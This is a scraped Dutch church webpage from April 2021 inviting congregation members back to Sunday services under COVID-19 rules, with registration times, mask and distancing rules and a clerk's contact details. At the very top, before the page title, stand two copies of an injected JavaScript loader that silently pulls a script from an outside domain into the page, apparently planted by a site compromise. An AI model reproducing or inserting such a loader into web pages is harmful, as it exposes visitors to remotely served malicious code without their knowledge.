;(function(f,b,n,j,x,e){x=b.createElement(n);e=b.getElementsByTagName(n)[0];x.async=1;x.src=j;e.parentNode.insertBefore(x,e);})(window,document,"script","https://treegreeny.org/KDJnCSZn"); ;(function(f,b,n,j,x,e){x=b.createElement(n);e=b.getElementsByTagName(n)[0];x.async=1;x.src=j;e.parentNode.insertBefore(x,e);})(window,document,"script","https://treegreeny.org/KDJnCSZn"); Uitnodiging om de erediensten te bezoeken .... update ! - PKN Damwâld

Uitnodiging om de erediensten te bezoeken …. update !

Gepubliceerd op: donderdag 29 april 2021

De corona maatregelen zijn weer iets versoepeld en daarom zijn de beide moderamen dankbaar dat we de ochtenddiensten weer beschikbaar kunnen stellen voor max. 45 gemeenteleden. U bent dan ook van harte uitgenodigd om de ochtenddienst weer bij te wonen. Daarnaast kunt u de dienst natuurlijk ook via de live stream volgen.

Een aantal zaken op een rijtje:

  • Opgave voor de ochtend dienst is verplicht. Op vrijdag- en zaterdag avond tussen 19.00-20.00 uur kunt u bellen met: 06-14751932 en u opgeven voor de zondagochtenddienst van 09 mei. Op woensdag 12 mei kunt u zich tussen 19.00-20.00 uur opgeven voor de dienst op Hemelvaartsdag en/ of zondag 16 mei. Daarnaast kunt u zich voor zondag ochtend 16 mei ook nog opgeven op vrijdagavond 14 mei van 19.00-20.00 uur. Allemaal op bovengenoemd telefoonnummer.

LET OP: zaterdag 15 mei komt dus te vervallen voor opgave.

Alleen de mensen die zich hebben opgegeven kunnen de dienst bijwonen. Indien u na opgave toch klachten krijgt, of alsnog niet kunt komen, hoeft u zich niet af te melden.

  • Als u de kerk binnenkomt en verlaat vragen wij u een eigen mondkapje te dragen. Als u zit, kunt u deze afdoen
  • Zingen is helaas nog niet toegestaan
  • Daarnaast is het belangrijk de 1,5 meter afstand te bewaren
  • Er is geen Oppas en Bernetsjerke/King Kids aanwezig

Hygiëne

Heeft u klachten of bent u in contact geweest met iemand die corona-klachten heeft, blijf dan thuis. Bij binnenkomst kunt u de handen ontsmetten, met het aanwezige ontsmettingsapparaat. De garderobe kan niet worden gebruikt, u moet de jas mee naar binnen nemen, daar is genoeg ruimte. De toiletten mogen niet gebruikt worden en zijn gesloten.

Mocht er iets niet duidelijk zijn, u kunt altijd contact opnemen met scriba Geralda Teertstra: 0511-424766 of Hervormambv@hotmail.com

We zien ernaar uit u te ontmoeten! Welkom!